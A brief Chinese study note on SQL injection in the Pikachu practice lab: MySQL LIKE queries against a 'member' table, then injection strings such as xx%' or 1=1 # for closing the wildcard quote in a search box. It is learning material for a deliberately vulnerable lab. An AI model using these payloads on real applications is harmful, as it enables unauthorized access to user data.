在 MySQL 的 bin 路径下打开 cmd ,输入下面的命令,再输入 数据库的密码
mysql -u root -p
show databases;
use pikachu
desc member;
select id,username,email from member;
select id,username,email from member where id=1;
select id,username,email from member where username='vince';
select id,username,email from member where username='vin';
%vin :查询 以vin结尾 的名称
select id,username,email from member where username='%vin';
select id,username,email from member where username like '%vin';
select id,username,email from member where username like 'vin%';
select id,username,email from member where username like '%vin%';
select id,username,email from member where username like '%%vin%%';
在Pikachu靶场里查询
xx' or 1=1 #
要注意 闭合% ,让信息查的全
xx%' or 1=1 #
%xx%' or 1=1 #